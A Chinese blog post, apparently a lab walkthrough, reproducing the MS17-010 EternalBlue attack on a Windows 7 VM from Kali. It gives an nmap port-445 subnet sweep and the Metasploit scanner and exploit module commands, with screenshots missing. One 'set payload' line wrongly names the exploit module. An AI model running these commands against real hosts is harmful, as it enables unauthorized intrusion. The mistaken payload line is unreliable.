remote pc ms17-010

我们将使用以下工具对此进行演示

  • 厉害的Linux
  • win7
  • VMware或VirtualBox(虚拟环境)

注意:此实验仅用于教育目的,任何非法活动概不负责。

测试目的:

通过实施针对性的渗透测试,发现win7系统的安全漏洞,复现ms17-010,熟悉渗透测试流程。

测试范围:

本次测试的范围详细如下:

系统名称 未知
测试时间 2020.10.24
测试工具 kali linux
说明 本次渗透测试过程中使用网络环境为私有内网

 

 

 

 

 

 

 

 

数据来源:

通过漏洞扫描和手动分析获取相关数据。

全网搜索445端口

nmap -p 445 192.168.31.0/24

remote pc ms17-010

 

 

 

 

 

 搜索ms17-010

remote pc ms17-010

 

 

auxiliary模块 检查漏洞: 

use 1 或者use auxiliary/scanner/smb/smb_ms17_010 

remote pc ms17-010

 

 

发现漏洞存在 

remote pc ms17-010

 

 

 

渗透利用:

搜索ms17-010 :search ms17-010

使用exploit永恒之蓝设置参数: use 2 或exploit/windows/smb/ms17-010_eternalblue

设置攻击负载:set payload 2 或者 set payload exploit/windows/smb/ms17-010_eternalblue

remote pc ms17-010

 

 

 remote pc ms17-010

 

 攻击成功:

 

 

 

 remote pc ms17-010

 

 

 

后渗透:

remote pc ms17-010

 

 remote pc ms17-010

 

 remote pc ms17-010

 

 remote pc ms17-010

 

上一篇:Metasploit之漏洞利用( Metasploitable2)


下一篇:de1ay靶场实战